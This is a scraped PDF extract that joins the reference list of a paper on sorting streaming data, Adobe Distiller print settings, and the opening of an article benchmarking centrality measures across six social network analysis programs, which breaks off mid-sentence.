Communications Surveys & Tutorials 17(4):2347–2376 DOI 10.1109/COMST.2015.2444095. Babcock B, Babu S, Datar M, Motwani R, Widom J. 2002. Models and issues in data stream systems. In: Proceedings of the Twenty-First ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems, PODS ’02. New York, 1–16. Bey Ahmed Khernache M, Laga A, Boukhobza J. 2018. Montres-nvm: an external sorting algorithm for hybrid memory. In: 2018 IEEE 7th Non-Volatile Memory Systems and Applications Symposium (NVMSA). Piscataway: IEEE, 49–54. Buragohain C, Suri S. 2009. Quantiles on streams. In: Encyclopedia of Database Systems. New York: Springer-Verlag US, 2235–2240. Cardenas A, Manadhata P, Rajan S. 2013. Big data analytics for security. IEEE Security & Privacy 11(6):74–76 DOI 10.1109/MSP.2013.138. Cormen TH, Leiserson CE, Rivest RL, Stein C. 2009. Introduction to algorithms. Third Edition. Cambridge: The MIT Press. Dave M, Gianey H. 2016. Different clustering algorithms for big data analytics: a review. In: 2016 International Conference System Modeling & Advancement in Research Trends. 328–333. Dua D, Graff C. 2019. UCI machine learning repository: school of information and computer science. Irvine: University of California. Elder M, Goh YK. 2018. Permutations sorted by a finite and an infinite stack in series. In: International Conference on Language and Automata Theory and Applications. 220–231. Farnoud F, Yaakobi E, Bruck J. 2016. Approximate sorting of data streams with limited storage. Journal of Combination Optimization 32:1133–1164. Faro S, Marino FP, Scafiti S. 2020. Fast-insertion-sort: a new family of efficient variants of the insertion-sort algorithm. In: SOFSEM (Doctoral Student Research Forum). 37–48. Franceschini G. 2004. Proximity mergesort: optimal in-place sorting in the cache-oblivious model. In: Proceedings of the Fifteenth Annual ACM-SIAM Symposium on Discrete Algorithms, SODA. Vol. 15. New York: ACM, 291–299. Gantz J, Reinsel D. 2012. The digital universe in 2020: big data, bigger digital shadows, and biggest growth in the far east. IDC iView: IDC Analyze the future 2007(2012):1–16. Goel S, Kumar R. 2018. Brownian motus and clustered binary insertion sort methods: an efficient progress over traditional methods. Future Generation Computer Systems 86(4):266–280 DOI 10.1016/j.future.2018.04.038. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 25/27 https://archive.ics.uci.edu/ml/datasets/KEGG+Metabolic+Reaction+Network+(Undirected) https://archive.ics.uci.edu/ml/datasets/KEGG+Metabolic+Reaction+Network+(Undirected) https://archive.ics.uci.edu/ml/datasets/Buzz+in+social+media+ https://archive.ics.uci.edu/ml/datasets/Buzz+in+social+media+ http://dx.doi.org/10.7717/peerj-cs.355#supplemental-information http://dx.doi.org/10.7717/peerj-cs.355#supplemental-information http://dx.doi.org/10.1109/COMST.2015.2444095 http://dx.doi.org/10.1109/MSP.2013.138 http://dx.doi.org/10.1016/j.future.2018.04.038 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Huang X, Liu Z, Li J. 2019. Array sort: an adaptive sorting algorithm on multi-thread. Journal of Engineering 2019(5):3455–3459 DOI 10.1049/joe.2018.5154. Idrizi F, Rustemi A, Dalipi F. 2017. A new modified sorting algorithm: a comparison with state of the art. In: 2017 6th Mediterranean Conference on Embedded Computing. 1–6. Kanza Y, Yaari H. 2016. External sorting on flash storage: reducing cell wearing and increasing efficiency by avoiding intermediate writes. VLDB Journal 25(4):495–518 DOI 10.1007/s00778-016-0426-5. Katal A, Wazid M, Goudar R. 2013. Big data: Issues, challenges, tools and good practices. In: 2013 Sixth International Conference on Contemporary Computing. 404–409. Kehoe B, Patil S, Abbeel P, Goldberg K. 2015. A survey of research on cloud robotics and automation. IEEE Transactions on Automation Science and Engineering 12(2):398–409. Keim D, Qu H, Ma K-L. 2013. Big-data visualization. IEEE Computer Graphics and Applications 33(4):20–21. Laga A, Boukhobza J, Singhoff F, Koskas M. 2017. Montres: merge on-the-run external sorting algorithm for large data volumes on ssd based storage systems. IEEE Transactions on Computers 66(10):1689–1702. Lee Y-S, Quero LC, Kim S-H, Kim J-S, Maeng S. 2016. Activesort: efficient external sorting using active ssds in the mapreduce framework. Future Generation Computer Systems 65:76–89. Li Y, Martinez O, Chen X, Li Y, Hopcroft JE. 2016. In a world that counts: clustering and detecting fake social engagement at scale. Republic and Canton of Geneva: International World Wide Web Conferences Steering Committee. Liang Y, Chen T, Chang Y, Chen S, Wei H, Shih W. 2020. B*-sort: enabling write-once sorting for non-volatile memory. In: IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems. Piscataway: IEEE. Mehmood A, Natgunanathan I, Xiang Y, Hua G, Guo S. 2016. Protection of big data privacy. IEEE Access 4:1821–1834. Metwally A, Agrawal D, El Abbadi A. 2005. Duplicate detection in click streams. In: Proceedings of the 14th International Conference on World Wide Web. 12–21. Mohammed AS, Amrahov a E, Çelebi FV. 2017. Bidirectional conditional insertion sort algorithm; an efficient progress on the classical insertion sort. Future Generation Computer Systems 71:102–112. Osama H, Omar Y, Badr A. 2016. Mapping sorting algorithm. In: 2016 SAI Computing Conference (SAI). 488–491. O’Malley O. 2008. Terabyte sort on apache hadoop. Available at http://sortbenchmark. org/Yahoo- Hadoop. Sedgewick R, Wayne K. 2011. Algorithms. Boston: Addison-Wesley Professional. Singh H, Sarmah M. 2015. Comparing rapid sort with some existing sorting algorithms. In: Das K, Deep K, Pant M, Bansal J, Nagar A, eds. Proceedings of Fourth International Conference on Soft Computing for Problem Solving: Advances in Intelligent Systems and Computing. Vol. 335. New Delhi: Springer. Tambouratzis T. 1999. A novel artificial neural network for sorting. IEEE Transactions on Systems, Man, and Cybernetics: Part B 29(2):271–275. Thusoo A, Shao Z, Anthony S, Borthakur D, Jain N, Sarma J, Murthy R, Liu H. 2010. Data warehousing and analytics infrastructure at facebook. In: Proceedings of the ACM SIGMOD International Conference on Management of Data, SIGMOD 2010. 1013–1020. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 26/27 http://dx.doi.org/10.1049/joe.2018.5154 http://dx.doi.org/10.1007/s00778-016-0426-5 http://sortbenchmark.org/Yahoo-Hadoop http://sortbenchmark.org/Yahoo-Hadoop http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Vatrapu R, Mukkamala RR, Hussain A, Flesch B. 2016. Social set analysis: a set theoretical approach to big data analytics. IEEE Access 4:2542–2571. Vignesh R, Pradhan T. 2016. Merge sort enhanced in place sorting algorithm. In: 2016 International Conference on Advanced Communication Control and Computing Technologies (ICACCCT). 698–704. Witayangkurn A, Horanont T, Shibasaki R. 2012. Performance comparisons of spatial data processing techniques for a large scale mobile phone dataset. YiLiang S, Zhenghong Y. 2016. Communication rules learning strategy in big data network based on SVN neural network. In: 2016 International Conference on Intelligent Transportation, Big Data & Smart City. 309–313. Zhai C, Zhang Y, Hu P. 2018. Modeling and analysis of material supply network based on big data packed with traffic. In: 2018 IEEE 3rd International Conference on Cloud Computing and Big Data Analysis. Piscataway: IEEE, 490–494. Zhao C, Chang H, Liu Q. 2017. Bayesian algorithm based traffic prediction of big data services in openflow controlled optical networks. In: 2017 IEEE 2nd International Conference on Big Data Analysis (ICBDA). Piscataway: IEEE, 823–826. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 27/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor Introductions Constraints Definitions and notations Concepts Proposed algorithm Experimental results and discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_gti6s2kynvfxho6svyezzm33bm ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 23 Are We in Agreement? Benchmarking and Reliability Issues between Social Network Analytic Programs Philip J. Murphy Middlebury Institute of International Studies Monterey, CA, USA YuFei Wang Middlebury Institute of International Studies Monterey, CA, USA Karen T. Cuenco University of Pittsburgh Pittsburgh, PA, USA Abstract Reliability and validity are key concerns for any researcher. We investigate these concerns as they apply to social network analysis programs. Six well-used and trusted programs were compared on four common centrality measures (degree, betweenness, closeness, and eigen- vector) under a variety of network topographies. We identify notable inconsistencies between programs that may not be apparent to the average user of these programs. Specifically, each program may have implemented a variant of a given measure without informing the user of its characteristics. This presents an unnecessary obfuscation for analysts seeking measures that are best suited to the idiosyncrasies of their data, and for those comparing results between programs. Under such a paradigm, the terms in use within the social network analysis community become less precise over time and diverge from the original strength of network analysis: clarity. Acknowledgements The authors would like to thank Elma Paulauskaite and Maizy Cuenco for their help in putting together this research. This work was funded in part through a grant from the National Institutes of Health: Grant number NIDCR 1R03DE020127. Authors Philip J. Murphy, Middlebury Institute of International Studies, Monterey, CA, USA. YuFei Wang, Middlebury Institute of International Studies, Monterey, CA, USA. Karen T.Cuenco, Department of Human Genetics, University of Pittsburgh, PA, USA. Correspondence concerning this work should be addressed to Philip J. Murphy, Middlebury Institute of International Studies, 460 Pierce St., Monterey CA 93940 USA, pjmurphy@miis.edu; phone: 831- 647-4600; fax: 831-647-6693 Connections Benchmarking and Reliability Issues 24 | Volume 37 | Issues 1&2 | insna.org Introduction An important part of the appeal of social network analysis originates from the in- corporation of mathematical descriptions for social relations. This has made it possi- ble to provide clear and unambiguous defi- nitions for concepts relating to relational structures. The clarity of communication that resulted from this intersection of mathematics and social sciences has been credited with much of the field’s early growth (Freeman 1984). As Freeman re- lates, [From] the start, contributions to social network analysis were often couched in mathematical terms. The rela- tive precision of these mathematical treat- ments gave social networks an advantage. Because of that precision, the network field did not generate the same kinds of quibbles and misunderstandings over terms and concepts that lead to conflict in fields that are wedded to a natural language. (2004) The mathematical core of social network analysis has delivered the dual benefits of precision and flexibility. Equa- tions are clear to the point that those who were interested in the topic could build up- on one another’s work with minimal need for clarification. But mathematical defini- tions are also general enough to allow for their application in a variety of relational contexts. The structural measures that form the core of social network analysis have thereby proven to be compelling in a varie- ty of contexts and interests. The logarith- mic proliferation in where and how social network analysis has been applied (Otte and Rousseau 2002, Freeman 2011) is tes- tament to the scalability of the field. The diverse purposing of social network analysis has been mirrored by a corresponding proliferation in the number and variety of software packages that are available today in the field of social net- work analysis. Although software develop- ers and programmers have put a great deal of effort into producing network analytic software that is suited to a wide variety of needs and applications, no single piece of software is generally applicable to every situation. Software packages have been op- timized for efficiency, analytic variety, an- alytic specificity, ease of use, specialized data handling, greater capacity for visuali- zation, and for terminology and concepts that are tailored to a particular end-user. Software also differs in style of user inter- face, method of reporting, and even the de- fault methods for scaling output. As the available packages continue to diversify, their content is also converg- ing. However, the question of whether the analytic functions across programs are tru- ly equivalent and exchangeable arises. Are the names being used to identify each function explicit in what they identify, or are they only referring to a generalized class of functions? Naming conventions are important. The developers of network analytic soft- ware are faced with decisions about how they should implement a particular analytic function. Some software developers may choose to incorporate the ability to handle common topological features of social networks (e.g., loops, multiple compo- nents) by default, while others may choose a stricter interpretation of how the measure or algorithm should perform. Under such a paradigm, the terms in use within the so- cial network analysis community become less precise over time and diverge from the original strength of network analysis: clari- ty. It is possible that a measure or algo- rithm differs by implementation in order to address some given scenario or feature of network topology, and that it therefore bears unique attributes that constitute a trade-off at some level. It is therefore valu- able to both analysts and the social net- work analysis community for any such dif- ferences to be explicit, or systematized. The issue of whether two software implementations produce the same measures is especially important when us- ing two programs in concert. In such situa- tions, consistency of output indicates that the user is introducing a minimum of vari- ability when moving from one program to Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 25 another. The equivalency of network met- rics is important as small variations in such basic measures may translate into large dif- ferences on more complex algorithms. However, procedural dissimilarities in programs’ calculations of measures can be difficult to identify and frequently lack documentation. Differences in how various soft- ware programs provide output constitute a barrier to assessing consistency of measures from program to program. The variety in default output styles (e.g., raw scores, normalized scores, scalar multi- plied output) makes it difficult to visually compare raw output. Even if there were to be no meaningful difference in the infor- mation provided in the output, the empiri- cal differences that are evident on casual inspection make such a judgment more dif- ficult to establish. The numbers may look different, but in many cases the user would never know just by visual inspection. Table 1: Analytic interfaces used in this study Our primary focus is an assessment of inter-program reliability and three relat- ed questions. Are the various software pack- ages producing consistently equiva- lent results? If not, how do they differ? Under what conditions do the centrality outputs diverge, if divergences exist? To assess inter-program reliability, we focused on the basic building block of network analysis: node centrality. Specifi- cally, the investigation involved the four most commonly applied centrality measures: degree, betweenness, closeness, and eigenvector (Valente et al. 2008). Such measures are often fundamental to social network analysis. Here, we evaluate and report on the consistency of basic measures of node centrality from across various software platforms in standardized simula- tions. Materials and Methods Six software packages for social network analysis were compared in terms of their calculations of four basic measures of node centrality in each of four networks. We se- lected popular network analytic software that are self-contained (UCINET, Pajek, ORA, and Gephi), or available through CRAN R archive (sna and igraph) packag- es (Table 1, below). Measures The “big four” centrality measures (degree, betweenness, closeness, and eigenvector12 centrality) were calculated using each ana- 12 The program Pajek does not include a measure titled eigenvector centrality. In cases of undirected networks, Pajek’s “hubs and authorities” measure is analogous to eigenvector centrality and was used for the purpose of comparison. Version Source UCINET 6.564 http://www.analytictech.com/ Pajek 4.03 http://pajek.imfm.si/ ORA-NetScenes 3.0.9.9.20 http://www.casos.cs.cmu.edu/projects/ora/ Gephi 0.8.2 http://gephi.org/ sna 2.3-2 http://www.statnet.org/ igraph 0.7.1 http://igraph.org/ Connections Benchmarking and Reliability Issues 26 | Volume 37 | Issues 1&2 | insna.org lytic interface. These measures were se- lected because they are basic measures that are frequently used alone for analytic in- ference, as well as functioning as constitu- ent parts of more complex algorithms. Var- iability in these measures may lead to downstream variation in analytic results for more complex algorithms. Some pro- grams produce output in multiple formats (e.g., raw, normalized, scaled). When pos- sible, similarly scaled output was com- pared (Table 2, below). Table 2: Output scaling Centrality measures were deemed to be optimally correspondent if the Pear- son correlation coefficient comparing two centrality values was 1.0000. The closer the correlation is to the optimally con- sistent value and when scatterplots lie along a 45° line, the better the centrality values concur between software calcula- tions. Optimal consistency is invariant to scale and magnitude differences in raw centrality values. If the correlation fell be- low 1.0000, then there was suggestive evi- dence that these measures lacked consen- sus across software. Scatterplots offer additional insight for comparing similar measures that em- ploy different scales. If any nodes are of particular interest to the analyst then poten- tial variations in their measurement may become very important. Deviations in the measurement of a small number of nodes within a large network could still occur within the correlation threshold that we se- lected. Scatterplots were therefore used to identify or characterize variation in meas- urement and assess whether such variation, if present, is a singular anomaly (e.g., dif- ferences in floating point) or appear to be deviations that are patterned (i.e., errors that arise from differences in the assump- tions behind how a measure should be cal- culated). Datasets Network data (graphs) of variable size and modality were generated to compare cen- trality measures across software packages. Undirected one-mode [small (n=35) and a moderately large (n=2000)] and two-mode [small (n1=10, n2=25) and a moderately large (n1=300, n2=1500)] network datasets were generated. Initially, both the one- mode, and two-mode networks contained smaller disconnected components (e.g., isolates and/or other small components) in addition to a large main component (Table 2). One-mode networks also contained loops. New networks were created by re- moving loops, removing smaller compo- nents, or both, from the initial network in order to model a variety of conditions. This resulted in twelve networks: both large and small networks that contain either loops, or disconnected components, or both, or nei- ther; as appropriate for one- or two-mode networks. Each dataset was designed to be well within the data handling limits of each of the software packages that we evaluat- ed. Most of the programs tested were lim- ited mainly by concerns such as network density and size, in addition to the proces- sor speed and the amount of available memory in a given computer. All are Degree Closeness Betweenness Eigenvector Gephi Raw Normalized Av- erage Raw Scaled (max=1) Pajek Raw Normalized Normalized Normalized UCINET Raw Average Raw Normalized ORA Normalized Normalized Normalized Normalized sna Raw Normalized Raw Normalized igraph Raw Normalized Raw Scaled (max=1) Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 27 Table 3: Data used for reliability comparisons capable of handling networks into the tens of thousands of nodes, with some capable of handling networks into the millions of nodes. Centrality measures were calculat- ed using all six programs under a variety of conditions on all four networks, where ap- plicable.13 All graphs were undirected, with no multiple edges. These graphs were analyzed under multiple conditions: 1) loops (edges that recursively link a node to itself), but no disconnected components present; 2) disconnected components, but no loops present; 3) loops and disconnect- ed components present; and 4) a reference graph with no loops or disconnected com- ponents. For a more detailed description of the procedures used for each software pro- gram, see Appendix 1. Results Our findings, presented in brief form in Table 4, demonstrate that differences be- tween analytic programs exist on each measure, with the notable exception of betweenness centrality. Results are pre- sented below by measure, and within each measure, by network condition. Results are presented in a manner that highlights some of the most common or notable differences between programs. Consistency was considered to be “high” when no notable 13 Loops were not considered to be a feature that is consistent with the definition of two-mode networks as consisting of two sets of nodes that have ties between but not within each node set. The two-mode networks were therefore not evaluated for network data with loops. difference arose, “medium” when the out- put from one or two software implementa- tions differed from others, and “low” when the output from more than two software implementations differed from others. For the sake of brevity, many of the cases where all programs 